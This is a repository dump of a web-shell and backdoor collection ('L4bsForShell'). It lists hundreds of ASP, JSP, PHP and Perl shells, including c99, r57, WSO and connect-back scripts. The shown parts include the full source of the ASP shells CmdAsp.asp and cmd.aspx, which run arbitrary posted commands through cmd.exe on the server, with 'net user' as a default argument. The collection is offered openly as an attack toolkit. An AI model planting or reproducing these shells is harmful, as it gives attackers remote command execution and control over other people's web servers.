├── ASP ├── .svn │ ├── all-wcprops │ ├── entries │ ├── prop-base │ │ ├── cmd.asp.svn-base │ │ ├── cmd.aspx.svn-base │ │ ├── list.asp.svn-base │ │ ├── ntdaddy.asp.svn-base │ │ └── up.asp.svn-base │ └── text-base │ │ ├── 3fexe.txt.svn-base │ │ ├── ASpy.txt.svn-base │ │ ├── EFSO.txt.svn-base │ │ ├── ELMALISEKER Backd00r.asp.svn-base │ │ ├── NTDaddy.v1.9.txt.svn-base │ │ ├── RHTools.v1.5-BETA.txt.svn-base │ │ ├── RemExp.asp.svn-base │ │ ├── Server Variables.asp.svn-base │ │ ├── aspSH.v1.txt.svn-base │ │ ├── aspxSH.txt.svn-base │ │ ├── aspxshell.aspx.txt.svn-base │ │ ├── aspydrv.asp.svn-base │ │ ├── aspydrv.txt.svn-base │ │ ├── cmd.asp.svn-base │ │ ├── cmd.aspx.svn-base │ │ ├── cmdexec.aspx.svn-base │ │ ├── elmaliseker.asp.svn-base │ │ ├── filesystembrowser.aspx.svn-base │ │ ├── fileupload.aspx.svn-base │ │ ├── list.asp.svn-base │ │ ├── ntdaddy.asp.svn-base │ │ ├── spexec.aspx.svn-base │ │ ├── sql.aspx.svn-base │ │ ├── tool.asp.svn-base │ │ ├── toolaspshell.txt.svn-base │ │ ├── up.asp.svn-base │ │ ├── zehir.asp.svn-base │ │ ├── zehir.txt.svn-base │ │ ├── zehir4.asp.svn-base │ │ └── zehir4.txt.svn-base ├── 3fexe.asp ├── 3fexe.txt ├── ASpy.txt ├── EFSO.txt ├── ELMALISEKER Backd00r.asp ├── NTDaddy.v1.9.txt ├── RHTools.v1.5-BETA.txt ├── RemExp.asp ├── Server Variables.asp ├── aspSH.v1.txt ├── aspxSH.txt ├── aspxshell.aspx.txt ├── aspydrv.asp ├── aspydrv.txt ├── cmd-asp-5.1.asp ├── cmd.asp ├── cmd.aspx ├── cmdexec.aspx ├── elmaliseker.asp ├── filesystembrowser.aspx ├── fileupload.aspx ├── list.asp ├── ntdaddy.asp ├── spexec.aspx ├── sql.aspx ├── tool.asp ├── toolaspshell.txt ├── up.asp ├── zehir.asp ├── zehir.txt ├── zehir4.asp └── zehir4.txt ├── JSP ├── .svn │ ├── all-wcprops │ ├── entries │ ├── prop-base │ │ ├── browser.jsp.svn-base │ │ ├── cmd.jsp.svn-base │ │ ├── cmd_win32.jsp.svn-base │ │ ├── list.jsp.svn-base │ │ ├── up.jsp.svn-base │ │ └── up_win32.jsp.svn-base │ └── text-base │ │ ├── JspWebshell 1.2.jsp.svn-base │ │ ├── browser.jsp.svn-base │ │ ├── cmd.jsp.svn-base │ │ ├── cmd_win32.jsp.svn-base │ │ ├── jspShell.jsp.svn-base │ │ ├── jspbd.jsp.svn-base │ │ ├── list.jsp.svn-base │ │ ├── up.jsp.svn-base │ │ └── up_win32.jsp.svn-base ├── JspWebshell 1.2.jsp ├── browser.jsp ├── cmd.jsp ├── cmd_win32.jsp ├── jspShell.jsp ├── jspbd.jsp ├── list.jsp ├── up.jsp └── up_win32.jsp ├── PHP ├── .svn │ ├── all-wcprops │ ├── entries │ ├── prop-base │ │ ├── cmd.php.svn-base │ │ ├── list.php.svn-base │ │ ├── phpshell.php.svn-base │ │ └── up.php.svn-base │ └── text-base │ │ ├── 150.php.svn-base │ │ ├── 27.9.txt.svn-base │ │ ├── 2mv2.txt.svn-base │ │ ├── 404.php.svn-base │ │ ├── 404.txt.svn-base │ │ ├── Ajax_PHP Command Shell.txt.1.svn-base │ │ ├── Ajax_PHP Command Shell.txt.svn-base │ │ ├── Ani-Shell.php.svn-base │ │ ├── AntiSecShell.v0.5.txt.svn-base │ │ ├── Antichat Shell v1.3.php.svn-base │ │ ├── Antichat Shell v1.3.txt.svn-base │ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt.svn-base │ │ ├── Backdoor.PHP.Agent.php.svn-base │ │ ├── Crystal.txt.svn-base │ │ ├── CrystalShell v.1.txt.svn-base │ │ ├── Cyber Shell (v 1.0).php.svn-base │ │ ├── DTool Pro.txt.svn-base │ │ ├── Dive Shell 1.0 - Emperor Hacking Team.php.svn-base │ │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt.svn-base │ │ ├── Dx.txt.svn-base │ │ ├── DxShell.1.0.txt.svn-base │ │ ├── FaTaLisTiCz_Fx.txt.svn-base │ │ ├── Fx29Sh.3.2.12.08.txt.svn-base │ │ ├── G5.php.svn-base │ │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt.svn-base │ │ ├── GNY.Shell.v1.1.txt.svn-base │ │ ├── KAdot Universal Shell v0.1.6.php.svn-base │ │ ├── KAdot Universal Shell v0.1.6.txt.svn-base │ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.svn-base │ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt.svn-base │ │ ├── Macker's Private PHPShell.php.svn-base │ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt.svn-base │ │ ├── MySQL Web Interface Version 0.8.php.svn-base │ │ ├── MySQL Web Interface Version 0.8.txt.svn-base │ │ ├── Mysql interface v1.0.txt.svn-base │ │ ├── NCC-Shell.txt.svn-base │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.svn-base │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt.svn-base │ │ ├── NetworkFileManagerPHP.txt.svn-base │ │ ├── PH Vayv.txt.svn-base │ │ ├── PHANTASMA.txt.svn-base │ │ ├── PHP Shell.txt.svn-base │ │ ├── PHPJackal.txt.svn-base │ │ ├── PHPRemoteView.txt.svn-base │ │ ├── PHPSPY.php.svn-base │ │ ├── Php_Backdoor.txt.svn-base │ │ ├── Private-i3lue.php.svn-base │ │ ├── Private-i3lue.txt.svn-base │ │ ├── RedhatC99 [login=redhat-pass=root].svn-base │ │ ├── Rootshell.v.1.0.txt.svn-base │ │ ├── Safe mode breaker.php.svn-base │ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt.svn-base │ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.svn-base │ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt.svn-base │ │ ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.txt.svn-base │ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.svn-base │ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt.svn-base │ │ ├── SimShell 1.0 - Simorgh Security MGZ.php.svn-base │ │ ├── SimShell 1.0 - Simorgh Security MGZ.txt.svn-base │ │ ├── SnIpEr_SA Shell.txt.svn-base │ │ ├── Sst-Sheller.php.svn-base │ │ ├── SyRiAn.Sh3ll.V7.txt.svn-base │ │ ├── SyRiAn.Sh3ll.v7.txt.svn-base │ │ ├── Uploader.txt.svn-base │ │ ├── WinX Shell.php.svn-base │ │ ├── WinX Shell.txt.svn-base │ │ ├── Worse Linux Shell.php.svn-base │ │ ├── Worse Linux Shell.txt.svn-base │ │ ├── a.php.svn-base │ │ ├── aZRaiLPhp v1.0.php.svn-base │ │ ├── aZRaiLPhp v1.0.txt.svn-base │ │ ├── accept_language.txt.svn-base │ │ ├── acid.php.svn-base │ │ ├── antichat.php.svn-base │ │ ├── arabicspy.php.svn-base │ │ ├── b37.php.svn-base │ │ ├── b374k.v1.txt.svn-base │ │ ├── backupsql.txt.svn-base │ │ ├── bdotw44shell.txt.svn-base │ │ ├── bug (1).php.svn-base │ │ ├── bug.php.svn-base │ │ ├── bypass.txt.svn-base │ │ ├── c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php.svn-base │ │ ├── c100.txt.svn-base │ │ ├── c37.php.svn-base │ │ ├── c66.php.svn-base │ │ ├── c99-bd.txt.svn-base │ │ ├── c99-shadows-mod.php.svn-base │ │ ├── c99.php.svn-base │ │ ├── c99.txt.svn-base │ │ ├── c993.txt.svn-base │ │ ├── c99_2.txt.svn-base │ │ ├── c99_PSych0.php.svn-base │ │ ├── c99_locus7s.txt.svn-base │ │ ├── c99_madnet.txt.svn-base │ │ ├── c99_w4cking.txt.svn-base │ │ ├── c99madshell.php.svn-base │ │ ├── c99shell.php.svn-base │ │ ├── c99ud.txt.svn-base │ │ ├── c99unlimited.txt.svn-base │ │ ├── c99v2.php.svn-base │ │ ├── cbfphpsh.txt.svn-base │ │ ├── cihshell_fix.php.svn-base │ │ ├── cmd.php.svn-base │ │ ├── cmd.txt.svn-base │ │ ├── co.php.svn-base │ │ ├── connect-back.php.txt.svn-base │ │ ├── cpanel.txt.svn-base │ │ ├── cpg_143_incl_xpl.php.svn-base │ │ ├── ctt_sh.txt.svn-base │ │ ├── cybershell.txt.svn-base │ │ ├── dC3 Security Crew Shell PRiV.txt.svn-base │ │ ├── dC3.Security.Crew.Shell.priv8.txt.svn-base │ │ ├── egy.txt.svn-base │ │ ├── erne.txt.svn-base │ │ ├── ex0shell.txt.svn-base │ │ ├── fx.txt.svn-base │ │ ├── g00nshell-v1.3.txt.svn-base │ │ ├── g00nv13.php.svn-base │ │ ├── gfs_sh.txt.svn-base │ │ ├── h4ntu shell [powered by tsoi].php.svn-base │ │ ├── h4ntu shell [powered by tsoi].txt.svn-base │ │ ├── hkrkoz.php.svn-base │ │ ├── iMHaPFtp.txt.svn-base │ │ ├── ironshell.txt.svn-base │ │ ├── isko.txt.svn-base │ │ ├── iskorpitx.txt.svn-base │ │ ├── itsecteam.v2.1.txt.svn-base │ │ ├── itsecteam_shell.php.svn-base │ │ ├── jHn.php.svn-base │ │ ├── knullsh.txt.svn-base │ │ ├── kolang-bypass.txt.svn-base │ │ ├── kral.txt.svn-base │ │ ├── lamashell.txt.svn-base │ │ ├── list.php.svn-base │ │ ├── load_shell.txt.svn-base │ │ ├── locus.txt.svn-base │ │ ├── log.txt.svn-base │ │ ├── lolipop.txt.svn-base │ │ ├── lostDC.txt.svn-base │ │ ├── ly0kha.txt.svn-base │ │ ├── matamu.txt.svn-base │ │ ├── megabor.txt.svn-base │ │ ├── metaslsoft.php.svn-base │ │ ├── mini.j0s_ali.j0e.v27.9.txt.svn-base │ │ ├── myshell.txt.svn-base │ │ ├── mysql.txt.svn-base │ │ ├── mysql_tool.txt.svn-base │ │ ├── mysqlwebsh.php.svn-base │ │ ├── newsh.php.svn-base │ │ ├── nshell.txt.svn-base │ │ ├── nst.txt.svn-base │ │ ├── nstview.txt.svn-base │ │ ├── p0isoN.sh3ll.txt.svn-base │ │ ├── pHpINJ.txt.svn-base │ │ ├── php-backdoor.txt.svn-base │ │ ├── php-include-w-shell.txt.svn-base │ │ ├── phpjackal1.3.txt.svn-base │ │ ├── phpshell.php.svn-base │ │ ├── priv8-2012-bypass-shell.txt.svn-base │ │ ├── pws.txt.svn-base │ │ ├── r57-bd.txt.svn-base │ │ ├── r57.1.4.0.php.svn-base │ │ ├── r57.mod-bizzz.shell.txt.svn-base │ │ ├── r57.php.svn-base │ │ ├── r57.txt.svn-base │ │ ├── r57142.php.svn-base │ │ ├── r57_Mohajer22.txt.svn-base │ │ ├── r57_iFX.txt.svn-base │ │ ├── r57_kartal.txt.svn-base │ │ ├── r57shell1.40.txt.svn-base │ │ ├── r57shell2.0.txt.svn-base │ │ ├── redcod.php.svn-base │ │ ├── remview_fix.php.svn-base │ │ ├── rootshell.txt.svn-base │ │ ├── ru24_post_sh.txt.svn-base │ │ ├── s72 Shell v1.1 Coding.php.svn-base │ │ ├── s72 Shell v1.1 Coding.txt.svn-base │ │ ├── safe0ver.txt.svn-base │ │ ├── shellzx.txt.svn-base │ │ ├── simattacker.txt.svn-base │ │ ├── simple-backdoor.txt.svn-base │ │ ├── simple_cmd.txt.svn-base │ │ ├── small.txt.svn-base │ │ ├── sniper.txt.svn-base │ │ ├── soldierofallah.txt.svn-base │ │ ├── sosyete.txt.svn-base │ │ ├── spygrup.txt.svn-base │ │ ├── sql.php.svn-base │ │ ├── stres.txt.svn-base │ │ ├── ugdevil.v2.0.txt.svn-base │ │ ├── up.php.svn-base │ │ ├── uploader.txt.svn-base │ │ ├── wso.v2.5.txt.svn-base │ │ ├── wso2.5.php.svn-base │ │ ├── wso2.php.svn-base │ │ ├── x0rg.byp4ss.txt.svn-base │ │ └── zacosmall.txt.svn-base ├── 150.php ├── 27.9.txt ├── 2mv2.txt ├── 404.php ├── 404.txt ├── Ajax_PHP Command Shell.txt ├── Ajax_PHP Command Shell.txt.1 ├── Ani-Shell.php ├── AntiSecShell.v0.5.txt ├── Antichat Shell v1.3.php ├── Antichat Shell v1.3.txt ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt ├── Backdoor.PHP.Agent.php ├── CCCP-Shell.php ├── CCCP-Shell_old_nocrypt_.php ├── Crystal.txt ├── CrystalShell v.1.txt ├── Cyber Shell (v 1.0).php ├── DTool Pro.txt ├── Dive Shell 1.0 - Emperor Hacking Team.php ├── Dive Shell 1.0 - Emperor Hacking Team.txt ├── Dx.txt ├── DxShell.1.0.txt ├── FaTaLisTiCz_Fx.txt ├── Fx29Sh.3.2.12.08.txt ├── G5.php ├── GFS web-shell ver 3.1.7 - PRiV8.txt ├── GNY.Shell.v1.1.txt ├── KAdot Universal Shell v0.1.6.php ├── KAdot Universal Shell v0.1.6.txt ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt ├── Macker's Private PHPShell.php ├── Moroccan Spamers Ma-EditioN By GhOsT.txt ├── MySQL Web Interface Version 0.8.php ├── MySQL Web Interface Version 0.8.txt ├── Mysql interface v1.0.txt ├── NCC-Shell.txt ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt ├── NetworkFileManagerPHP.txt ├── PH Vayv.txt ├── PHANTASMA.txt ├── PHP Shell.txt ├── PHPJackal.txt ├── PHPRemoteView.txt ├── PHPSPY.php ├── Php_Backdoor.txt ├── Private-i3lue.php ├── Private-i3lue.txt ├── RedhatC99 [login=redhat-pass=root] ├── Rootshell.v.1.0.txt ├── Safe mode breaker.php ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.txt ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt ├── SimShell 1.0 - Simorgh Security MGZ.php ├── SimShell 1.0 - Simorgh Security MGZ.txt ├── SnIpEr_SA Shell.txt ├── Sst-Sheller.php ├── SyRiAn.Sh3ll.V7.txt ├── SyRiAn.Sh3ll.v7.txt ├── Uploader.txt ├── WinX Shell.php ├── WinX Shell.txt ├── Worse Linux Shell.php ├── Worse Linux Shell.txt ├── a.php ├── aZRaiLPhp v1.0.php ├── aZRaiLPhp v1.0.txt ├── accept_language.txt ├── acid.php ├── antichat.php ├── arabicspy.php ├── b37.php ├── b374k.v1.txt ├── backupsql.txt ├── bdotw44shell.txt ├── bug (1).php ├── bug.php ├── bypass.txt ├── c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php ├── c100.txt ├── c37.php ├── c66.php ├── c99-bd.txt ├── c99-shadows-mod.php ├── c99.php ├── c99.txt ├── c993.txt ├── c99_2.txt ├── c99_PSych0.php ├── c99_locus7s.txt ├── c99_madnet.txt ├── c99_w4cking.txt ├── c99madshell.php ├── c99shell.php ├── c99ud.txt ├── c99unlimited.txt ├── c99v2.php ├── cbfphpsh.txt ├── cihshell_fix.php ├── cmd.php ├── cmd.txt ├── co.php ├── connect-back.php.txt ├── cpanel.txt ├── cpg_143_incl_xpl.php ├── ctt_sh.txt ├── cybershell.txt ├── dC3 Security Crew Shell PRiV.txt ├── dC3.Security.Crew.Shell.priv8.txt ├── egy.txt ├── erne.txt ├── ex0shell.txt ├── fx.txt ├── g00nshell-v1.3.txt ├── g00nv13.php ├── gfs_sh.txt ├── h4ntu shell [powered by tsoi].php ├── h4ntu shell [powered by tsoi].txt ├── hkrkoz.php ├── iMHaPFtp.txt ├── ironshell.txt ├── isko.txt ├── iskorpitx.txt ├── itsecteam.v2.1.txt ├── itsecteam_shell.php ├── jHn.php ├── knullsh.txt ├── kolang-bypass.txt ├── kral.txt ├── lamashell.txt ├── list.php ├── load_shell.txt ├── locus.txt ├── log.txt ├── lolipop.txt ├── lostDC.txt ├── ly0kha.txt ├── matamu.txt ├── megabor.txt ├── metaslsoft.php ├── mini.j0s_ali.j0e.v27.9.txt ├── myshell.txt ├── mysql.txt ├── mysql_tool.txt ├── mysqlwebsh.php ├── newsh.php ├── nshell.txt ├── nst.txt ├── nstview.txt ├── p0isoN.sh3ll.txt ├── pHpINJ.txt ├── php-backdoor.txt ├── php-include-w-shell.txt ├── phpjackal1.3.txt ├── phpshell.php ├── priv8-2012-bypass-shell.txt ├── pws.txt ├── r57-bd.txt ├── r57.1.4.0.php ├── r57.mod-bizzz.shell.txt ├── r57.php ├── r57.txt ├── r57142.php ├── r57_Mohajer22.txt ├── r57_iFX.txt ├── r57_kartal.txt ├── r57shell1.40.txt ├── r57shell2.0.txt ├── redcod.php ├── remview_fix.php ├── rootshell.txt ├── ru24_post_sh.txt ├── s72 Shell v1.1 Coding.php ├── s72 Shell v1.1 Coding.txt ├── safe0ver.txt ├── shellzx.txt ├── simattacker.txt ├── simple-backdoor.txt ├── simple_cmd.txt ├── small.txt ├── sniper.txt ├── soldierofallah.txt ├── sosyete.txt ├── spygrup.txt ├── sql.php ├── stres.txt ├── ugdevil.v2.0.txt ├── up.php ├── uploader.txt ├── wso.v2.5.txt ├── wso2.5.php ├── wso2.php ├── x0rg.byp4ss.txt └── zacosmall.txt ├── PL ├── .svn │ ├── all-wcprops │ ├── entries │ ├── prop-base │ │ ├── cmd.pl.svn-base │ │ ├── list.pl.svn-base │ │ └── up.pl.svn-base │ └── text-base │ │ ├── Perl Web Shell by RST-GHC.pl.svn-base │ │ ├── cgitelnet.txt.svn-base │ │ ├── cmd.pl.svn-base │ │ ├── dc.pl.svn-base │ │ ├── list.pl.svn-base │ │ └── up.pl.svn-base ├── Perl Web Shell by RST-GHC.pl ├── cgitelnet.txt ├── cmd.pl ├── dc.pl ├── list.pl └── up.pl └── README.md /ASP/.svn/all-wcprops: -------------------------------------------------------------------------------- 1 | K 25 2 | svn:wc:ra_dav:version-url 3 | V 36 4 | /svn/!svn/ver/16/trunk/Backdoors/ASP 5 | END 6 | elmaliseker.asp 7 | K 25 8 | svn:wc:ra_dav:version-url 9 | V 51 10 | /svn/!svn/ver/9/trunk/Backdoors/ASP/elmaliseker.asp 11 | END 12 | aspSH.v1.txt 13 | K 25 14 | svn:wc:ra_dav:version-url 15 | V 48 16 | /svn/!svn/ver/7/trunk/Backdoors/ASP/aspSH.v1.txt 17 | END 18 | Server Variables.asp 19 | K 25 20 | svn:wc:ra_dav:version-url 21 | V 58 22 | /svn/!svn/ver/9/trunk/Backdoors/ASP/Server%20Variables.asp 23 | END 24 | RemExp.asp 25 | K 25 26 | svn:wc:ra_dav:version-url 27 | V 46 28 | /svn/!svn/ver/9/trunk/Backdoors/ASP/RemExp.asp 29 | END 30 | cmdexec.aspx 31 | K 25 32 | svn:wc:ra_dav:version-url 33 | V 48 34 | /svn/!svn/ver/3/trunk/Backdoors/ASP/cmdexec.aspx 35 | END 36 | zehir4.txt 37 | K 25 38 | svn:wc:ra_dav:version-url 39 | V 47 40 | /svn/!svn/ver/16/trunk/Backdoors/ASP/zehir4.txt 41 | END 42 | aspxSH.txt 43 | K 25 44 | svn:wc:ra_dav:version-url 45 | V 46 46 | /svn/!svn/ver/7/trunk/Backdoors/ASP/aspxSH.txt 47 | END 48 | cmd.asp 49 | K 25 50 | svn:wc:ra_dav:version-url 51 | V 43 52 | /svn/!svn/ver/9/trunk/Backdoors/ASP/cmd.asp 53 | END 54 | ELMALISEKER Backd00r.asp 55 | K 25 56 | svn:wc:ra_dav:version-url 57 | V 62 58 | /svn/!svn/ver/6/trunk/Backdoors/ASP/ELMALISEKER%20Backd00r.asp 59 | END 60 | toolaspshell.txt 61 | K 25 62 | svn:wc:ra_dav:version-url 63 | V 53 64 | /svn/!svn/ver/16/trunk/Backdoors/ASP/toolaspshell.txt 65 | END 66 | zehir4.asp 67 | K 25 68 | svn:wc:ra_dav:version-url 69 | V 46 70 | /svn/!svn/ver/9/trunk/Backdoors/ASP/zehir4.asp 71 | END 72 | 3fexe.txt 73 | K 25 74 | svn:wc:ra_dav:version-url 75 | V 45 76 | /svn/!svn/ver/7/trunk/Backdoors/ASP/3fexe.txt 77 | END 78 | ASpy.txt 79 | K 25 80 | svn:wc:ra_dav:version-url 81 | V 44 82 | /svn/!svn/ver/7/trunk/Backdoors/ASP/ASpy.txt 83 | END 84 | aspxshell.aspx.txt 85 | K 25 86 | svn:wc:ra_dav:version-url 87 | V 54 88 | /svn/!svn/ver/3/trunk/Backdoors/ASP/aspxshell.aspx.txt 89 | END 90 | list.asp 91 | K 25 92 | svn:wc:ra_dav:version-url 93 | V 44 94 | /svn/!svn/ver/3/trunk/Backdoors/ASP/list.asp 95 | END 96 | fileupload.aspx 97 | K 25 98 | svn:wc:ra_dav:version-url 99 | V 51 100 | /svn/!svn/ver/3/trunk/Backdoors/ASP/fileupload.aspx 101 | END 102 | zehir.txt 103 | K 25 104 | svn:wc:ra_dav:version-url 105 | V 45 106 | /svn/!svn/ver/7/trunk/Backdoors/ASP/zehir.txt 107 | END 108 | tool.asp 109 | K 25 110 | svn:wc:ra_dav:version-url 111 | V 44 112 | /svn/!svn/ver/9/trunk/Backdoors/ASP/tool.asp 113 | END 114 | spexec.aspx 115 | K 25 116 | svn:wc:ra_dav:version-url 117 | V 47 118 | /svn/!svn/ver/3/trunk/Backdoors/ASP/spexec.aspx 119 | END 120 | NTDaddy.v1.9.txt 121 | K 25 122 | svn:wc:ra_dav:version-url 123 | V 52 124 | /svn/!svn/ver/7/trunk/Backdoors/ASP/NTDaddy.v1.9.txt 125 | END 126 | filesystembrowser.aspx 127 | K 25 128 | svn:wc:ra_dav:version-url 129 | V 58 130 | /svn/!svn/ver/3/trunk/Backdoors/ASP/filesystembrowser.aspx 131 | END 132 | zehir.asp 133 | K 25 134 | svn:wc:ra_dav:version-url 135 | V 45 136 | /svn/!svn/ver/9/trunk/Backdoors/ASP/zehir.asp 137 | END 138 | up.asp 139 | K 25 140 | svn:wc:ra_dav:version-url 141 | V 42 142 | /svn/!svn/ver/3/trunk/Backdoors/ASP/up.asp 143 | END 144 | aspydrv.txt 145 | K 25 146 | svn:wc:ra_dav:version-url 147 | V 48 148 | /svn/!svn/ver/16/trunk/Backdoors/ASP/aspydrv.txt 149 | END 150 | RHTools.v1.5-BETA.txt 151 | K 25 152 | svn:wc:ra_dav:version-url 153 | V 57 154 | /svn/!svn/ver/7/trunk/Backdoors/ASP/RHTools.v1.5-BETA.txt 155 | END 156 | ntdaddy.asp 157 | K 25 158 | svn:wc:ra_dav:version-url 159 | V 47 160 | /svn/!svn/ver/3/trunk/Backdoors/ASP/ntdaddy.asp 161 | END 162 | sql.aspx 163 | K 25 164 | svn:wc:ra_dav:version-url 165 | V 44 166 | /svn/!svn/ver/3/trunk/Backdoors/ASP/sql.aspx 167 | END 168 | aspydrv.asp 169 | K 25 170 | svn:wc:ra_dav:version-url 171 | V 47 172 | /svn/!svn/ver/9/trunk/Backdoors/ASP/aspydrv.asp 173 | END 174 | EFSO.txt 175 | K 25 176 | svn:wc:ra_dav:version-url 177 | V 44 178 | /svn/!svn/ver/7/trunk/Backdoors/ASP/EFSO.txt 179 | END 180 | cmd.aspx 181 | K 25 182 | svn:wc:ra_dav:version-url 183 | V 44 184 | /svn/!svn/ver/3/trunk/Backdoors/ASP/cmd.aspx 185 | END 186 | -------------------------------------------------------------------------------- /ASP/.svn/prop-base/cmd.asp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /ASP/.svn/prop-base/cmd.aspx.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /ASP/.svn/prop-base/list.asp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /ASP/.svn/prop-base/ntdaddy.asp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /ASP/.svn/prop-base/up.asp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/3fexe.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/3fexe.txt.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/EFSO.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/EFSO.txt.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/ELMALISEKER Backd00r.asp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/ELMALISEKER Backd00r.asp.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/NTDaddy.v1.9.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/NTDaddy.v1.9.txt.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/RHTools.v1.5-BETA.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/RHTools.v1.5-BETA.txt.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/RemExp.asp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/RemExp.asp.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/Server Variables.asp.svn-base: -------------------------------------------------------------------------------- 1 | <% 2 | Dim Vars 3 | %> 4 | 5 |

 

6 |

 

7 |

A list of all server 8 | variables :

9 |


10 |
11 |

12 | 13 | 14 | 17 | 20 | 21 | <% For Each Vars In Request.ServerVariables %> 22 | 23 | 24 | 25 | 26 | <% Next %> 27 |

Server 15 | Variable Name

16 |

Server 18 | Variable Value

19 |
<%= Vars %><%= Request.ServerVariables(Vars) %> 
28 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/cmd.asp.svn-base: -------------------------------------------------------------------------------- 1 | <%@ Language=VBScript %> 2 | <% 3 | ' --------------------o0o-------------------- 4 | ' File: CmdAsp.asp 5 | ' Author: Maceo 6 | ' Release: 2000-12-01 7 | ' OS: Windows 2000, 4.0 NT 8 | ' ------------------------------------------- 9 | 10 | Dim oScript 11 | Dim oScriptNet 12 | Dim oFileSys, oFile 13 | Dim szCMD, szTempFile 14 | 15 | On Error Resume Next 16 | 17 | ' -- create the COM objects that we will be using -- ' 18 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 19 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 20 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 21 | 22 | ' -- check for a command that we have posted -- ' 23 | szCMD = Request.Form(".CMD") 24 | If (szCMD <> "") Then 25 | 26 | ' -- Use a poor man's pipe ... a temp file -- ' 27 | szTempFile = "C:\" & oFileSys.GetTempName( ) 28 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 29 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 30 | 31 | End If 32 | 33 | %> 34 | 35 | 36 |
" method="POST"> 37 | 38 | 39 |
40 |
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
42 | 
43 | <% 44 | If (IsObject(oFile)) Then 45 | ' -- Read the output from our command and remove the temp file -- ' 46 | On Error Resume Next 47 | Response.Write Server.HTMLEncode(oFile.ReadAll) 48 | oFile.Close 49 | Call oFileSys.DeleteFile(szTempFile, True) 50 | End If 51 | %> 52 | 53 | 54 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/cmd.aspx.svn-base: -------------------------------------------------------------------------------- 1 | <%@ Page Language="VB" Debug="true" %> 2 | <%@ import Namespace="system.IO" %> 3 | <%@ import Namespace="System.Diagnostics" %> 4 | 5 | 25 | 26 | 27 | 28 |
29 |

Program 30 | c:\windows\system32\cmd.exe 31 |

Arguments 32 | /c net user 33 |

34 |

35 |

36 | 37 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/cmdexec.aspx.svn-base: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO" %> 4 | 5 | 6 | 7 | 63 | 64 | 65 | 66 | Command 67 | 68 | 69 |
70 |
71 | 72 | 73 | 74 | 75 | 76 |
77 |
78 |
